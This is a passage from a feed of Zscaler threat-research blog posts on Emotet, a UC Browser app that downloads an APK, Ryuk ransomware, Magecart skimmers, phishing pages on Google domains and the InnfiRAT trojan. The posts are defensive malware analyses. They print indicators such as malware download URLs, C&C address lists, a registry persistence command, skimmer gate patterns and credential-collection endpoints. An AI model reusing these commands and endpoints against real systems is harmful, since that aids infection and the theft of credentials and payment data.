KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhALk+KlHgOKXm9eDkWu2yN9lanjwOm6W2\nPV0tgr4msNVby2pOJ6S1MZQnQwxl7y6WWzT4kveAQhLmW8JB2M2PDOxZOgVMJH2C\nAtkVW1p/P9jNJWVvjK9SmrbLdIeiKNtRfQIDAQAB -----END PUBLIC KEY----- -----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM426uN11n2LZDk/JiS93WIWG7fGCQmP\n4h5yIJUxJwrjwtGVexCelD2WKrDw9sa/xKwmQKk3b2fUhwnHXjoSpR7pLaDo7pEc\niJB5y6hjbPyrSfL3Fxu74M2SAS0Arj3uAQIDAQAB -----END PUBLIC KEY----- -----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB\nKZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0\nh4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB -----END PUBLIC KEY----- Figure 5: Emotet RSA keys used before and after the break. RSA1 and RSA2 were used before the break. In this new campaign, we saw Emotet using RSA3, RSA4, and RSA5. (1, 2, 3, 4, and 5 are assigned based on their first observation sequence in the wild). Before the break, the two RSA keys didn't share any C&C infrastructure. In this new campaign, two sub-botnets are sharing some infrastructure (as shown in the following screenshots). Figure 6: Emotet RSA keys and C&C infrastructure before the break. Figure 7: RSA keys and C&C infrastructure of the new Emotet campaign. If we check the overall C&C infrastructure and RSA key relationships before and after the break, we can clearly see a reorganization of the C&C infrastructure, which is now divided among three new Epochs. One Epoch is divided into two while the other one is used to create a single botnet with some new C&Cs. Figure 8: The Emotet RSA key and C&C infrastructure relationships before and after the break.   Emotet Downloader payload - Technical analysis The Emotet infection cycle generally starts with spam emails containing malicious macro documents that drop a JavaScript file. This JavaScript file further downloads the Emotet payload from a compromised WordPress website. Almost all the samples we observed were served from compromised WordPress websites (mostly version 5.2.3).  We will take a look at one such malicious document for the purpose of analysis here -  MD5 – 359696113a2156617c28d4f79cc7d44b (“file 20190924 LTR6051.doc”) The macro in the documents is quite simple and straightforward but contains lots of junk. Figure 9: Macro code containing junk instructions.   After removing the junk, this is how the macro code looks. Figure 10: Cleaned macro code.   It gets its text from TextBox1 in UserForm2, then saves that in a "JS" file before executing that file. Figure 11: A user form containing javascript code.   This JavaScript file is heavily obfuscated. More obfuscation is being added to the "JS" code incrementally. As in earlier versions of this downloader, some of the strings and function names were readable and now almost every string is obfuscated. Figure 12: Heavily obfuscated script This script contains an array of strings in variable “a.” First, the elements of the array are shuffled using an anonymous function just after the array definition. Then there is function “b,” which is used to decrypt strings and is extensively used throughout the script. Using this function, we can log the decrypted strings just before they return. Some of the interesting strings include: \+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d)) while (true) {} return (function() {}.constructor("return this")( ) 4|0|7|5|3|1|8|2|6 2|1|0|6|3|5|4 split debug error exception trace http://thewomentour.com/wp-includes/f8yezb9/ WScript.Shell ResponseBody ActiveXObject https://www.marquedafrique.com/k9c5qh/eb1wiw8192/ Scripting.FileSystemObject CreateObject https://thecrystaltrees.com/nofij3ksa/o5523/ http://4excellent.com/wp-includes/ii950106/ WScript.Shell Popup MSXML2.XMLHTTP GET open send http://www.davidleighlaw.com/wp-content/wlfsj15707/ Position Open Type SaveToFile random toString substr 0|1|3|4|2 11|15|13|4|6|9|8|7|5|0|2|3|1|10|16|14|12 return (function() {}.constructor("return this")( ) 7|2|8|0|5|1|4|6|3 2|0|3|4|1 0|14|11|8|3|6|13|9|5|2|1|12|4|10|7 Not Supported File Format There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn't correctly decoded). The script's functionality can be clearly determined from the decrypted strings. It downloads, saves, and runs its payload from a list of URLs and shows the following message box to trick a user into believing the file is corrupt: Figure 13: An error message to trick a user into believing the file is corrupt. There are multiple URLs embedded in the script files. The following URLs were extracted from this script: http://thewomentour[.]com/wp-includes/f8yezb9/ https://www[.]marquedafrique[.]com/k9c5qh/eb1wiw8192/ https://thecrystaltrees[.]com/nofij3ksa/o5523/ http://4excellent[.]com/wp-includes/ii950106/ http://www[.]davidleighlaw[.]com/wp-content/wlfsj15707/ In this case, the Emotet loader is downloaded from “http://thecrystaltrees[.]com/nofij3ksa/o5523/” (MD5 – 402b20268d64acded1c48ce760c76c47). The Emotet loader already has been extensively analyzed and blogged about, so we won't be getting into technical details of the loader here. Below are artifacts extracted from this sample: RSA key extracted from this sample: -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB\nKZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0\nh4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB\n-----END PUBLIC KEY----- C&C server addresses from the sample: 187[.]188[.]166[.]192:80, 200[.]57[.]102[.]71:8443, 200[.]21[.]90[.]6:8080, 46[.]41[.]134[.]46:8080, 178[.]249[.]187[.]151:8080, 217[.]199[.]160[.]224:8080, 71[.]244[.]60[.]230:7080, 119[.]59[.]124[.]163:8080, 185[.]86[.]148[.]222:8080, 190[.]230[.]60[.]129:80, 178[.]79[.]163[.]131:8080, 186[.]83[.]133[.]253:8080, 179[.]62[.]18[.]56:443, 91[.]205[.]215[.]57:7080, 217[.]113[.]27[.]158:443, 181[.]36[.]42[.]205:443, 190[.]19[.]42[.]131:80, 183[.]82[.]97[.]25:80, 77[.]245[.]101[.]134:8080, 109[.]104[.]79[.]48:8080, 159[.]203[.]204[.]126:8080, 5[.]77[.]13[.]70:80, 189[.]187[.]141[.]15:50000, 46[.]28[.]111[.]142:7080, 46[.]21[.]105[.]59:8080, 189[.]166[.]68[.]89:443, 183[.]87[.]87[.]73:80, 190[.]200[.]64[.]180:7080, 79[.]143[.]182[.]254:8080, 119[.]92[.]51[.]40:8080, 187[.]155[.]233[.]46:443, 89[.]188[.]124[.]145:443, 201[.]163[.]74[.]202:443, 62[.]75[.]160[.]178:8080, 51[.]15[.]8[.]192:8080, 46[.]29[.]183[.]211:8080, 62[.]75[.]143[.]100:7080, 114[.]79[.]134[.]129:443, 190[.]230[.]60[.]129:80, 190[.]117[.]206[.]153:443, 203[.]25[.]159[.]3:8080, 217[.]199[.]175[.]216:8080, 80[.]85[.]87[.]122:8080, 190[.]1[.]37[.]125:443, 23[.]92[.]22[.]225:7080, 81[.]169[.]140[.]14:443, 46[.]163[.]144[.]228:80, 5[.]196[.]35[.]138:7080, 189[.]129[.]4[.]186:80, 151[.]80[.]142[.]33:80, 190[.]221[.]50[.]210:8080, 190[.]104[.]253[.]234:990, 71[.]244[.]60[.]231:7080, 91[.]83[.]93[.]124:7080, 181[.]81[.]143[.]108:80, 181[.]188[.]149[.]134:80, 50[.]28[.]51[.]143:8080, 123[.]168[.]4[.]66:22, 211[.]229[.]116[.]97:80, 201[.]184[.]65[.]229:80, 77[.]55[.]211[.]77:8080, 212[.]71[.]237[.]140:8080, 190[.]38[.]14[.]52:80, 46[.]41[.]151[.]103:8080, 149[.]62[.]173[.]247:8080, 87[.]106[.]77[.]40:7080, 86[.]42[.]166[.]147:80, 109[.]169[.]86[.]13:8080, 88[.]250[.]223[.]190:8080, 138[.]68[.]106[.]4:7080, 200[.]58[.]171[.]51:80 Conclusion Emotet is an ever-evolving threat, employing new tricks and tactics. Although it started as a banking trojan, Emotet is now associated with several different malware campaigns, including ransomware and infostealers. The Zscaler ThreatLabZ team proactively tracks and ensures coverage to block downloaders, payloads, and C&C activity from Emotet and other threats. ThreatLabZ is the research division of Zscaler. To learn more about ThreatLabZ and Zscaler cloud activity, visit https://www.zscaler.com/threatlabz/cloud-activity-dashboard
Categorías: Security Posts

UC Browser app abuses may have exposed 500 million users

Zscaler Research - Hace 1 hora 14 mins
Recently, when examining the Zscaler cloud for unusual activity, ThreatLabZ researchers found some questionable hits in relation to a particular domain: 9appsdownloading[.]com. Upon analysis, we found these requests being made from a popular browser that's available on Google Play and has more than 500 million downloads to date: the UC Browser app.    Fig. 1: UC Browser on Google Play   As we began to analyze the UC Browser app, we found that the requests were being made to download an additional Android Package Kit (APK) over an unsecured channel (HTTP over HTTPS). Downloading and/or updating components from a third-party source violates Google Play policy, which states: “An app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play.” We decided to explore further into the UC Browser app and found the following issues, which will be discussed in detail in this blog:   Downloading an additional APK from a third party – in violation of Google Play policy Communication over an unsecured channel – opening doors to man-in-the-middle attacks Dropping an APK on external storage (/storage/emulated/0) – allowing other apps, with appropriate permissions, to tamper with the APK We found another app called UC Browser Mini from the same developer with the same functionality and issues, and it dropped the same additional APK from a remote server. The screenshot below shows UC Mini on Google Play.   Fig. 2: UC Browser Mini (UC Mini)   It is important to note that these issues have the potential to affect millions of Android users because the UC Browser app has been downloaded 500 million+ times and UC Mini has been downloaded 100 million+ times. The ThreatLabZ team has been in contact with Google, whose teams are investigating the apps.  Timeline: August 13, 2019: Zscaler reported policy violation to Google. August 13, 2019: Google promptly responded. Case assigned to an investigation team.  August 13 – September 25, 2019: Follow-up emails with research details. September 27, 2019: Google confirmed policy violation by UC Browser and UC Mini. Google contacted UC developers to update the apps and remediate the policy violation.  Update: After Google's intervention, the Zscaler research team noticed that the latest version of both the apps, UC Browser and UC Mini, have stopped downloading the third-party app store.   Technical Details of UC Browser Name: UC Browser Package Name: com.UCMobile.intl Installs: 500,000,000+ (500M +) Developer: UCWeb Singapore Pte. Ltd.   1. Downloading an APK from a third party Upon finding the UC Browser app as the main culprit, we decided to dig deeper into our analysis of the app. As soon as the app is installed, it displays basic activities (Android screens) to set up default language, topics of interest, location, and so on.  Fig. 3: UC Browser app icon and initial Android activity   After some initial requests for news and notifications, the app sends multiple requests with redirections and finally drops an APK on to the user’s device. The screenshot below illustrates the chain of requests and redirects taking place:    Fig. 4 Unsecured requests for APK download   This functionality of dropping another APK from a third-party source clearly violates Google Play’s policy, which includes the following: “An app distributed via Google Play may not modify, replace, or update itself using any method other than Google Play's update mechanism. Likewise, an app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play. This restriction does not apply to code that runs in a virtual machine and has limited access to Android APIs (such as JavaScript in a webview or browser).” During our analysis, we found the APK being dropped on external storage but we did not find the APK being installed. It is possible that this functionality is still under development or there may be other reasons it wasn’t installed, such as exception, disabled unknown-sources option, or rooted device.    2. Communication over an unsecured channel  The APK was downloaded over an unsecured channel (HTTP over HTTPS), opening the possibility for man-in-the-middle (MiTM) attacks. In our research, we came across a recent Dr. Web blog post that talks about similar issues they saw with UC Browser downloading and installing libraries from remote servers. In that case, they talk about libraries being downloaded over HTTP and, in our case, we saw a completely new APK being dropped (this APK is also analyzed in the latter part of this blog).  The consequences of downloading and installing components over unsecured channels were well addressed in the Dr. Web blog, along with the MiTM vulnerability, so we will not address those issues further. We noticed that the app analyzed by Dr. Web researchers had the same icon as our sample, but had a different full-name and a different developer. The screenshots below show the Dr. Web sample (left) compared to the Zscaler sample (right): Fig. 5: UC Browser app samples: Dr. Web (left) and Zscaler (right)    It could be that the same app had been uploaded again on Google Play with a different name and developer along with modified or enhanced code to download additional APKs.    3. Dropping an APK on external storage We also noticed that the additional APK being dropped by this app is stored on external storage, which is world-readable by default. The screenshot below shows the location of the dropped APK: Fig. 6: Dropped APK storage location An APK being placed on external storage, or any other app with storage permission (android:name=android.permission.READ/WRITE_EXTERNAL_STORAGE) can have access to this location and can tamper with the downloaded APK.    Analysis of the dropped APK During our analysis, we noted that UC Browser was dropping the APK but not installing it. It is unclear whether this is due to the fact that the functionality is still under development or if there is another reason the APK is not installing. But we did want to find out what the APK contained, so we decided to manually install it and have a look inside. To our surprise, we found that the APK was actually a third-party app store named “9 Apps” with the package name com.mobile.indiapp.     Fig. 7: 9Apps app install process   After installing the app, it scans the device for installed apps. The app’s scanning and further activities can be seen in the screenshots below: Fig. 8: 9Apps initial activities   We also saw several adult apps available for download in this third-party app store. These apps can be seen in the screenshot below:    Fig. 9: Adult apps on 9Apps store   We tried downloading a small-sized app from the 9Apps store and, to our surprise, the app was downloaded from 9appsdownloading[.]com. This is the same domain that we mentioned at the beginning of this blog. The screenshot below shows the functionality in action:    Fig. 10: Sample APK download requests   Further scrutiny of Zscaler cloud traffic showed multiple requests for APK downloads from this 9appsdownloading[.]com domain. Within the last month, we found 130+ such requests. The hits can be seen in the Zscaler cloud dashboard:  Fig. 11: Zscaler dashboard showing the domain’s activity   Conclusion The tactics used by UC Browser and UC Mini violate Google Play security policies and make it possible for any malicious app to gain entry into a user's device. While 9Apps, an app store for Android apps, is not a malicious site, we searched the domain using VirusTotal, which showed a number of detections: Fig. 12: VirusTotal search for the domain   It is too early to determine exactly what the UC Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat. Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications. The UC Browser app’s use of unsecured channels also allows attackers to install an arbitrary payload on a device that can perform a variety of activities, such as display phishing messages designed to steal personal data, including usernames, passwords, and credit card numbers. Once a user device has been compromised, and that compromised device connects back at the office, attackers have the ability to establish a foothold in your network, so they can snoop, spread malware, or steal data.   
Categorías: Security Posts

Examining the Ryuk Ransomware

Zscaler Research - Hace 1 hora 14 mins
Ryuk ransomware had a disturbingly successful debut, being used to hit at least three organizations in its first two months of activity for more than $640,000 in ransom. Several attacks followed, where the attackers demanded even greater amounts of ransom.    The attackers were able to demand and receive high ransoms because of a unique trait in the Ryuk code: the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By carrying out these actions, the attackers could disable the Windows System Restore option, making it impossible for users to recover from the attack without external backups. Unlike other ransomware, Ryuk is distributed by common botnets, such as Trickbot and Emotet, which have been widely used as banking trojans. In this blog, we'll provide an analysis of how the Ryuk ransomware can encrypt a victim's data while blocking the infected system from restoring the data.    Analysis Ryuk dropper contains both 32-bit and 64-bit payloads. The dropper checks to see if it is being executed in a 32-bit or 64-bit OS using the "IsWow64Process" API and drops the payload accordingly. It also checks the version of the operating system. If it is executed in Windows XP, it drops the Ryuk payload at "C:\Documents and Settings\Default User\{random-5 char}.exe". If it is executed in Windows Vista or later versions of Windows, it drops the file at "C:\users\Public\{random-5 char}.exe”. Next, it executes the payload using the ShellExecuteW API.   Persistence mechanism Ryuk adds the following registry key so it will execute at every login. It uses the command below to create a registry key: ""C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\{random-5 char}.exe" /f"   Process injection Ryuk injects its main code into several remote processes. Ryuk enumerates the process by calling the CreateToolhelp32Snapshot API and injecting its code in all the processes except the ones named explorer.exe, lsaas.exe and csrss.exe, telling it that it should not be executed by the NT AUTHORITY. Ryuk ransomware terminates processes and stops services contained on a predefined list. These processes and services are mostly antivirus tools, databases, backups, and other software. The screenshot below shows the list of services stopped by Ryuk. Figure 1: The list of services disabled by the Ryuk ransomware. The screenshot below shows the list of processes terminated by Ryuk. Figure 2: The list of processes terminated by the Ryuk ransomware. Ryuk also deletes shadow copies and other backup storage files by using a .BAT file so that the infected system can’t restore data. Below is the list of commands used by Ryuk to perform these deletions. Figure 3: The list of commands used by Ryuk ransomware to delete shadow copies and other backup storage files.   Encryption and similarity with Hermes ransomware Ryuk uses a combination of RSA (asymmetric) and AES (symmetric) encryption to encrypt files. Ryuk embeds an RSA key pair in which the RSA private key is already encrypted with a global RSA public key. The sample generates an AES-256 key for each file and encrypts the files with an AES key. Further, the AES key is encrypted with an embedded public key and is appended at the end of the encrypted file. If all the samples contain the same RSA key pair, then after getting access to one private key, it's easy to decrypt all of the files. But Ryuk contains a different RSA key pair for every sample. Some samples append the ".RYK" extension and some don't append any extensions after encrypting the files. Ryuk has a common feature with Hermes ransomware. During encryption, Ryuk adds a marker in the encrypted file using the keyword “HERMES”. Ryuk checks for the HERMES marker before encrypting any file to know if it has been already encrypted. The screenshot below displays the HERMES marker and encrypted AES key appended at the end of the encrypted file. Figure 4: The HERMES marker and the encrypted AES key. Ryuk encrypts files in every drive and network shared from the infected system. It has whitelisted a few folders, including “Windows, Mozilla, Chrome, Recycle Bin, and Ahnlab” so it won’t encrypt files inside these folders. Ryuk drops its ransom note, named RyukReadMe.txt, in every directory. Ryuk asks for the ransom in bitcoin, providing the bitcoin address in the ransom note. Ryuk contains different templates for the ransom note. Below is a screenshot for RyukReadMe.txt file. Figure 5: Ryuk ransomware ransom note. After completing the encryption, Ryuk creates two files. One is “Public” and contains an RSA public key while the second is “UNIQUE_ID_DO_NOT_REMOVE” and contains a unique hardcoded key.   Conclusion While most ransomware is spread using spam email and exploit kits, Ryuk is delivered as a payload of the Emotet and Trickbot malware. Looking at the encryption process and ransom demands, Ryuk is targeting big enterprises in the hopes of large payoffs. Zscaler ThreatLabZ team continues to monitor this threat to ensure that Zscaler customers are protected.   IOCs MD5 5AC0F050F93F86E69026FAEA1FBB4450 6CDCB9F86972EFC4CFCE4B06B6BE053A 31BD0F224E7E74EEE2847F43AAE23974 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  Rajdeepsinh Dodia and Amandeep Kumar are security researchers on the Zscaler ThreatLabZ team.
Categorías: Security Posts

Magecart hits again, leveraging compromised sites and newly registered domains

Zscaler Research - Hace 1 hora 14 mins
During alert monitoring, ThreatLabZ researchers came across multiple cases of shopping sites being compromised and injected with a skimming script. This injected script looks for the payment method and personally identifiable information (PII) and captures supplied financial information which is then sent to an adversary-controlled gate server even before the user hits the submit form. There have been multiple reports published related to Magecart activity, and ThreatLabZ has blogged about the hacker group’s activities in the past. (Read previous blogs from September 2018 and July 2019.) In this blog, we will provide an overview of the current skimming campaigns with an analysis of those that use compromised sites to host the skimmer code and those that use newly registered domains. The following screen capture shows the Magecart hits we observed over the last 90 days. The activity appears to be fairly consistent week to week, with a spike at the end of the analysis period, and we believe it is likely to continue. Figure 1: Hits on compromised sites over 90 days (x-axis=date, y-axis=hits)   Most of the impacted websites are in the shopping category. The following graph shows the cloud-wide statistic for the number of unique domains per category for the sites impacted. Figure 2: URL categories of impacted sites (x-axis=URL category, y-axis=unique domain counts) This Magecart-based skimming campaign did not reveal any novel tactics, tools, or procedures, but it seems to be more structured in terms of the scripts being used across multiple compromises, similar gate URL parameter patterns, and the algorithm used for data encoding. The cycles we observed were generally the same, but we did see some differences. Some use obfuscation to hide the script injection code and use another compromised site for hosting the skimmer script, while others make use of newly registered domains for skimmer script hosting. Regardless of the loading script, the skimmer code possesses little to no obfuscation.   Cycle 1: Compromised site loads skimmer code from another compromised site The following image shows a Fiddler session to demonstrate the skimming chain. Figure 3: Fiddler session for Magecart skimming   In these skimming campaigns, we can see compromised sites sending captured payment information to domains that are either newly registered or compromised and under the control of an adversary. In the following example, the gate site is compromised as well and was registered on 2013-03-19. Figure 4: Example of injected script and skimmer code   The way this skimmer code operates is to wait for the user to fill in the personal information and payment method and capture it all before the user hits the submit button. This captured information is then encoded using the Base64 algorithm and sent to the gate URL in a GET request. Figure 5: Skimmer script sending base64 encoded PII and Payment Information GET Request   Cycle 2: Compromised site loads skimmer code from a newly registered domain As shown in the image below, the skimming script is being hosted on a domain registered just 10 days before this analysis. Figure 6: Compromised site leveraging skimmer script from a newly registered domain   All the skimmer scripts we’ve identified so far are similar, and we observed the following common gate URL pattern: hxxps://domain/{path}.(php|js)?hash=[base64data]   Figure 7: Skimmer script differences   We saw multiple cases where the same skimmer code locations were being used in multiple compromised sites, including: custommagnetsdirect[dot]com/catalog/view/javascript/jquery/jquery.sticky.js matteola[dot]com/js/varien/js.js The image below shows examples of skimmer code locations being used for multiple compromised sites.   Figure 8: The same skimmer code locations used in multiple compromised sites   Conclusion Magecart has been successful for years because attackers have improved their techniques for injecting malicious code and hiding it from detection. Now, we are seeing attackers able to steal payment card information before it is even submitted. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from skimming and other types of data-stealing attacks. Appendix Common skimmer JS URL patterns /5d1cbc8c073d4.js /baypressservices/baypr.js /check_cvv2_number_script.js /datetimepicker/bootstrap-datetimepicker.min.js /images/js/googleapi.js /javascript/checkcheckout.js /5d4cdc4cdf344.js /js/afterpay/checkout/idev_onestep.js /js/check_analystic.js /js/extjs/fix-defer-after.js /js/footer-link.js /js/front-scripts.min.js /js/lib/ccard.js /js/mage/cookies.js /js/mage/google.js /js/prototype/prototype.js /js/scriptaculous/print.js /varien/email.js /varien/js.js /varien/mail.js /my/vmart.js /qcore.js /rimzoneonline/code.js /silver/acor.js /wp-includes/js/jquery/jquery.js   Bad domains Creation date api-googles[dot]com 2019-03-30T18:40:29Z cloudflara[dot]org 2019-07-10T19:16:22Z developer-js[dot]info 2019-03-07T21:29:25Z facebookfollow[dot]com 2019-07-21T02:29:39Z googletagmanager-service[dot]com 2019-02-09T23:28:49Z gooqleadvstat[dot]com 2019-09-13T11:22:10Z jquery-cdn[dot]top 2018-09-28T07:41:02Z jquery-js[dot]com 2017-01-02T11:21:35Z jquery[dot]su 2019-02-27T19:12:36Z jquerycodemagento[dot]com 2019-08-11T13:05:43Z magento-security[dot]org 2017-11-14T16:32:41Z magento-track[dot]com 2018-12-28T20:44:11Z script-analytics[dot]com 2019-08-13T22:16:38Z  
Categorías: Security Posts

Phishing attacks abusing appspot.com and web.app domains on Google Cloud

Zscaler Research - Hace 1 hora 14 mins
In July, Zscaler ThreatLabZ posted a blog about a rise in the use of Microsoft Azure domains to host phishing attacks. Our researchers recently detected similar activity on the Google domains Appspot.com and Web.app. Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Web.app is a mobile platform used for building mobile apps hosted by Firebase, which is Google’s mobile app platform. These campaigns use SSL certificates issued by Appspot.com and Web.app, and they have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server. In the analysis that follows, we’ll describe the techniques these campaigns use to avoid detection and we’ll show the phishing domains and the locations where the user credentials are being sent. As of this date, many of these subdomains on appspot.com and web.app are not being flagged by VirusTotal.   Fig 1: VirusTotal detections for the subdomains   Web.app hosted phishing pages The following screenshots are phishing pages of some of the sites that have used an SSL certificate issued by Web.app. Fig 2: Microsoft login phishing page    Fig 3: SSL certificate page of the hosted phishing URL   Appspot.com hosted phishing pages Fig 4: Google Drive login phishing page   Fig 5: Outlook login phishing page   Fig 6: Dropbox login phishing page   Fig 7: DocuSign login phishing page     Fig 8: OneDrive login phishing page   Fig 9: OneDrive login phishing page   Fig 10: OneDrive login phishing page Evasion techniques This is a sophisticated phishing campaign as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages. In addition, the attackers are using the latest tactics to evade detection from scan engines, with most of the code written in an external JavaScript file. This filename is 32 characters long and different for every site.  Below is the source code of the phishing pages; the highlighted part is the external JavaScript mentioned above. Fig 11: Source code of phishing page Fig 12: Source code of phishing page In the above landing page source code of the phishing URL, there is less content, no brand name, and no catchy strings that are common in most phishing campaigns. This enables it to bypass many automatic analysis engines and extend its survival. The following screenshots show the code and the location where the user credentials are being sent. This code is present in randomly named, externally added JavaScript files. Fig 13: Location used by the attacker to collect user credentials  Fig 14: Location used by the attacker to collect user credentials The following figure shows a sample packet capture for this data being sent to the attacker’s site.  Fig 15: Packet capture for the data that has been sent to the attacker’s site   Zscaler is actively blocking these phishing pages. The following screen capture shows Zscaler detection for one of these pages: Fig 16: Zscaler successfully detects these domains    Phishing domains As of the writing of this blog, we have collected the following phishing domains. uy67dass[.]appspot[.]com ja8fspxzosaa[.]appspot[.]com gjf9pxzosa[.]appspot[.]com egoew023pzas[.]appspot[.]com vhkad03pas[.]appspot[.]com kda8gazxa[.]appspot[.]com adgkao93pz[.]appspot[.]com l9rwpodsxcs[.]appspot[.]com cvgfsaz[.]appspot[.]com jga9spzas[.]appspot[.]com jjad9gdpxzsa[.]appspot[.]com vadgka932oa[.]appspot[.]com ls9ixosdsasa[.]appspot[.]com qwsa92oozxa[.]appspot[.]com adlg402ooz[.]appspot[.]com bnb932psiz[.]appspot[.]com authofisaiz[.]web[.]app Telecomm-uk[.]web[.]app f45ghdsas[.]appspot[.]com Derr9qepzxas[.]appspot[.]com Vgdikad9oqww[.]appspot[.]com dsa3aszxsa[.]appspot[.]com weotwe0dpa[.]appspot[.]com Wy6fxsa[.]appspot[.]com Yu56sdzsa[.]appspot[.]com Vbhg45as[.]appspot[.]com Hds9pzoas[.]appspot[.]com khs9dpas[.]appspot[.]com u76dfsdasa[.]appspot[.]com y56fds[.]appspot[.]com vfhgj3sz[.]appspot[.]com eyq246ddpoas[.]appspot[.]com h45dsagga[.]appspot[.]com sds43dza[.]appspot[.]com yt76uyhxzz[.]appspot[.]com jh54dfaz[.]appspot[.]com ytyfazxz[.]appspot[.]com   Where information is sent  Below are the locations where the phishing page is sending credentials entered by the user.  https://osipz[.]c3y5-tools[.]com/1[.]newsvpost_ads_auto/loading[.]php https://osipz[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php https://xotpe[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://uiufz[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://xotpe[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php https://xotpe[.]bugcart[.]com/1[.]newsvpost_ads/loading[.]php https://xotpe[.]dtvd[.]biz/1[.]newsvpost_ads/loading[.]php https://uy6x[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://h76fg[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php https://hjif[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php  
Categorías: Security Posts

InnfiRAT: A new RAT aiming for your cryptocurrency and more

Zscaler Research - Hace 1 hora 14 mins
Recently, the Zscaler ThreatLabZ team came across a new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine. This blog provides an analysis of this new RAT, including the way it communicates, all the tasks it performs, and the information it steals.   Background As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user's computer. Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data. In addition, this RAT has ScreenShot functionality so it can grab information from open windows. For example, if the user is reading email, the malware takes a screenshot. It also checks for other applications running on the system, such as an active antivirus program.   InnfiRAT sends the data it has collected to its command-and-control (C&C) server and requests further instructions. The C&C can also instruct the malware to download additional payloads onto the infected system.   Technical analysis 1) Before executing the main payload, the malware initially checks whether the file is executing from %AppData% directory or not with the name NvidiaDriver.exe. If not, then a web request is sent to “iplogger[.]com/1HEt47" (possibly to check network connectivity). 2) It records all the running processes in an array, then iterates through each process and checks whether any process is running with the name NvidiaDriver.exe. If so, the malware kills that process and waits for an exit.   Figure 1: Checks execution location, terminates process with name NvidiaDriver            3) InnfiRAT copies itself as %AppData%/NvidiaDriver.exe and executes it from %AppData% before terminating the current process.                Figure 2: The malware makes a copy of itself in %AppData%    4) After confirming the path of file execution, it writes a Base64 encoded PE file in memory, which is later decoded in its actual format and is loaded after changing the entry point of the file. This is also a .NET executable and contains the actual functionality of the malware.   Figure 3: Embedded PE file in encoded form   Figure 4: Embedded PE file is decoded and executed Analysis of embedded .NET executable All the strings inside the file are encoded with a custom encoding scheme that utilizes the XOR operation. Figure 5: Strings decoding logic   As the execution of the malware starts, it checks for the presence of VM environment. It does so by checking the return value from the routine JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337. If the return value is equal to the first value, enum[0], defined in the enum shown below, then it continues the execution or else it terminates.   Figure 6: User-defined enum structure   After performing the VM checks, the malware obtains the country and HWID information of the machine it is running on. To obtain the country information, it calls the routine EjarVhXфf8752612307563884480() [FetchNetworkInfo] and fetches the Country key value from the returned data in JSON format. Similarly, to obtain the HWID, it calls the routine ubобмдGogBлzWKrgrыaZucвлC33208440168(). Anti-VM checks Inside the JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337() [VMDetection] routine: Note: All the enum values are referenced using enum[index] during analysis where the index starts from 0. 1. Performs WMIquery to obtain the following information: "Manufacturer" "Caption" "Name" "ProcessorId" "NumberOfCores" "NumberOfLogicalProcessors" "L2CacheSize" "L3CacheSize" "SocketDesignation" It then checks, one-by-one, if the manufacturer contains one of the below-mentioned strings and returns the value from the enum as specified: “VBoxVBoxVBox”                   returns enum[2] “VMwareVMware”                  returns enum[1] “Prl hyperv                               returns enum[3] “Microsoft Corporation”        returns enum[4] 2. WMIquery is performed again but this time to obtain the following information: "DeviceID" "MediaType" "Model" "PNPDeviceID" "SerialNumber" A check is performed if the PnpDeviceId contains one of the below strings and returns the value from the enum as specified: “VBOX_HARDDISK”             returns enum[2] “VEN_VMWARE”                  returns enum[1] If none of the above conditions match, it returns enum[0].   Machine network information Inside the EjarVhXфf8752612307563884480() [FetchNetworkInfo] routine: A web request is sent to the following URL https://ipinfo[.]io/json and the received data is returned from the function. The received data contains the following information:   "ip"   "city"   "region"   "country"   "loc"   "postal"   "org"   Figure 7: Web request being made   Network communication   Inside the мMлFкCцеGPбiбqюK1559516831() [CreateDuplexChannel] routine: InnfiRAT sets up a duplex channel with the name “IVictim” using DuplexChannelFactory tcp://62[.]210[.]142[.]219:17231/IVictim   Figure 